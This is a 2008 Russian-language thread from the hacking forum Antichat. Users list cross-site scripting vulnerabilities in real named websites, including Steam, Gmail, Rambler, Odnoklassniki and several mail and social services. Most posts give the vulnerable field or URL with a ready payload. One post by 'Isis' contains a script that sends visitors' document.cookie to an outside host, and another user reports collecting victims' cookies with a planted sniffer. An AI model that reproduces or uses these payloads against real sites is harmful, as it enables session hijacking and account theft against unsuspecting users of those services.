ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

diznt 24.08.2008 17:35

Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел

x-demon 24.08.2008 22:03

Цитата:

Сообщение от diznt
Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел

Это пассивка вроде
А поля там все уязвимы..

echobyte 27.08.2008 15:21

http://hnu.univerlife.com/prepods/comps/14672/

winstrool 28.08.2008 08:27

Екатеринбурский крупнейший портал города:
www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS

echobyte 31.08.2008 21:52

http://www.rozetka.com.ua/ru/products/comments/9217/index.html

Sn@k3 07.09.2008 18:21

пассивные
http://noxak.ru/snak3_find.html , но на SMSline.Biz .
там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.


Довольно-таки крупный поисковик.
http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2 Fscript%3E
14 алертов

BlackSun 11.09.2008 22:25

Активная xss в почтовике http://www.email.ro
Шлем в теле письма: <img src=1.gif onerror=xss>

iddqd 20.09.2008 16:23

wow.citynov.ru

Цитата:

http://wow.citynov.ru/index.php?n=account&sub=pms
В личных сообщениях не фильтруется поле "Тема".

iddqd 22.09.2008 17:48

Estemail.com.ua - полуплатная говнопочта.

Тупо не фильтруется поле "Тема" в письме.

DJ ][akep 22.09.2008 21:31

Универсальный оператор связи.
http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E

diznt 22.09.2008 21:40

https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>

дерзайте сайт всемирный фирмы каторая держить кс!
XSS нашол не я! ибо нашол на забугорных сайтах xss
Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......

Спасибо за внимание!

(извените если не туда)

iddqd 22.09.2008 22:01

http://webmail.meta.ua/img/logo_t.gif Meta.ua

Активная XSS при открытии вложения, а именно злобного SWF-файла.
Работает в Mozilla Firefox.
Файл создавать так:
http://forum.antichat.ru/showthread.php?t=65360
Проверил в Opera 9.52- тоже работает.

iddqd 22.09.2008 23:20

goroskop.bigmir.net

Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе".
Пример:
Цитата:

http://goroskop.bigmir.net/personal/#stage=payment&pid=5065224&s=18414763

iddqd 23.09.2008 19:47

Gmail.com
Та же самая ситуация с ядовитой флешкой.
Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).

iddqd 23.09.2008 21:26

Rambler.ru
И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире).

"Персональный":
Код:

http://horoscopes.rambler.ru/personal/index.html#stage=payment&pid=89576&s=0590207
"Китайский 2008":
Код:

http://horoscopes.rambler.ru/chineseyear/#stage=payment&pid=89576&s=28749925

iddqd 24.09.2008 16:36

Ukr.net

Украинская электронная почта №1

При заливке видео не фильтруется параметр "Ник":
Код:

http://play.ukr.net/auth/profile/id/449817/
Удалили уже...
Код:

http://play.ukr.net/auth/profile/id/449882/

winstrool 25.09.2008 12:36

))
Цитата:

http://www.itah.com/?query=%3Cscript
%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&itahsite=www.asiaep.com&userCode=J2ufVZpJNG9
A&sitesearch=www.asiaep.com&m=main&c=search_host&s a
=Search

xcedz 25.09.2008 23:02

Google.com

Вообщем есть такая замечательная штука как
Гаджеты гугла. Создаем в igoogle гаджет
и прописываем наш код cохраняем
(ссылочку на файл xml копируем )
создаем свой сайт там есть возможность вставить гаджет в страничку
в итоге

http://sites.google.com/site/xcedz0mbie/

прокатывает и в опере последней и в фф

iddqd 26.09.2008 00:56

одноклассники.ру

Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... :(

Код:

http://wg3.odnoklassniki.ru/dk?st.cmd=altGroupMain&st.groupId=43219581272223&tkn=1446

iddqd 26.09.2008 17:33

В продолжение темы о социальных сетях...
connect.ua

"Мои фото" -> создаем альбом.
Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>).

Код:

http://connect.ua/myphotos-272106
"Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля.

Код:

http://connect.ua/user-272106
Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно! ;)

iddqd 26.09.2008 18:59

TUT.UA- молодой, но довольно крупный проект.

При регистрации называем себя именем:
Код:

"><script>alert()</script>
Код:

http://ligendo.photo.tut.ua/
+ в списке новых пользователей:
Код:

http://photo.tut.ua/

BanQui 26.09.2008 21:26

Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))

BanQui 26.09.2008 21:33

Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)

Isis 27.09.2008 04:08

BanQui,
http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all

iddqd 27.09.2008 13:55

Antimir.com.ua - какбы социалка+знакомства ;)

При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес).

Блок "Интересы":
Ваши интересы=>и еще мне нравится=>кодес;
Чем Вы займетесь в свободное время=>а также=>кодес;
Занятия спортом=>другое=>кодес;
Стили музыки=>другое=>кодес.


Код:

http://antimir.com.ua/~ligendo

iddqd 27.09.2008 17:54

LiveInternet.ru

При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество".

Код:

http://www.liveinternet.ru/users/ligendo/profile/

diznt 27.09.2008 19:05

steampowered.com

http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20dizn t%27)%3C/script%3E

http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XX S%20by%20diznt%27)%3C/script%3E

http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript>

XSS найдены мною лично... (думаю +++ поставите)

Ch3ck 27.09.2008 19:14

Х*й тебе на воротник а не + ...
Ты различие между пассивками и активками видишь?

diznt 27.09.2008 19:19

Точно извените,
А нету спец раздела под пассивки?

ПС что такие не адекваты то?

Ch3ck 27.09.2008 19:25

Мне пох*й :)

iddqd 27.09.2008 19:43

mail.oboz.ua

Не фильтруется тело(!) письма, в отличии от темы... :confused:
Как в режиме текста, так и в html.

uaportal.com

"Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется :)

Код:

http://drevo.uaportal.com/userinfo/ligendo

procedure 27.09.2008 21:44

Просто смешно, написали свой форум с огромным кол-вом уязвимостей.
dropzone.by парашютный форум, - настоящие экстрималы)))
тут

iddqd 04.10.2008 16:08

planeta.rambler.ru

При просмотре профиля не фильтруется поле "Ник".

Код:

http://planeta.rambler.ru/users/nepoxek/
http://planeta.rambler.ru/users/nepoxek/profile/


Solide Snake 31.10.2008 00:52

http://i071.radikal.ru/0810/ed/d17ea7043adax.jpg

http://dom2.ru/

В комментарий можно вставить "><script>alert()</script>

Цитата:

http://dom2.ru/pulse/?id=28717&category=reports
p.s. Собчак лошадь =\

xcedz 31.10.2008 17:43

http://www.4shared.com
сервис для хранения файлов
Вариант 1
Заводим аккуант, далее заходим в панель управления и закачиваем файл ,
к примеру blabla.gif затем переименовываем его как {xssCode}.gif
Таким образом, если зайти на страничку со ссылкой на наш файл на этих сервисах, то
сработает наш "ядовитый" код.

Вариант 2
Отправляем личное сообщение юзеру с нашим {xssCode}. Для этого мы заходим на
ту страничку где есть ссылка на закачку файла.
При открытии в панели управления сообщения, отправленного нами, выполнится наш код.

используется на qip.ru :)

FaR-G9 07.11.2008 03:09

http://wow.ru/images/head_new_r1_c2.jpg

WOW.RU

Оффициальный русский сервер варкрафта

вводим в поиск
Цитата:

</title><script>alert(document.cookie)</script>
=))

NFM 07.11.2008 03:26

это не активка =\

diehard 07.11.2008 03:27

Цитата:

Сообщение от FaR-G9
http://wow.ru/images/head_new_r1_c2.jpg

WOW.RU

Оффициальный русский сервер варкрафта

вводим в поиск

=))

тут тема для активных XSS, или ты разницу не рубишь? :(

S00pY 07.11.2008 03:34

Цитата:

Сообщение от diehard
тут тема для активных XSS, или ты разницу не рубишь? :(
Это вообще не XSS, даже не пассивная, потому что GET-запрос не канает.

Это xss пассивная)))
Если ты так рубишь,то должен знатть про xss post методом))

зяблик 07.11.2008 18:45

народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?


Время: 03:43